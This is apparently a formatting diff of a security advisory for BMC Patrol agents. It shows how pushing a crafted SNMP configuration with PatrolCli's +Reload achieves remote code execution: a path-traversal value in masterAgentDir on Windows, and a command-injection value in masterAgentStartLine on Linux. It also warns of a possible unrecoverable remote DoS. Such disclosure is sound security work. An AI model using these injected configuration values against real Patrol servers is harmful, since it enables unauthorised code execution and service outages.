gquere/gquere.github.io/PatrolAdvisory.md

 "/snmp/masterAgentDir" = { REPLACE="bin/../../../Windows/system32/" },
 ```

-Do note that the masterAgentDir is relative and depends on Patrol's installation path.
+Do note that the ```masterAgentDir``` path is relative and depends on Patrol's installation path.
 Usually this is under C:\BMC.

 On Linux systems (according to my old notes, YMMV) it's a different parameter that leads to code execution:
 ```
 "/snmp/masterAgentStartLine" = { REPLACE="/usr/bin/touch /tmp/snmp ; /usr/bin/touch /tmp/snmp2 & #" },
 ```

-The configuration is pushed using the +Reload directive:
+The configuration is pushed using the ```+Reload``` directive:
 ```
 PatrolCli -host xxx +Reload /tmp/my_config
 ```

 To maximize chances of success, only the new SNMP configuration should be pushed.
-Remotely overwriting other parts of the configuration may result in an *unrecoverable* remote DoS.
+Remotely overwriting other parts of the configuration may result in an **unrecoverable** remote DoS.

 The agent needs to be remotely restarted for the modification to take effect:
 ```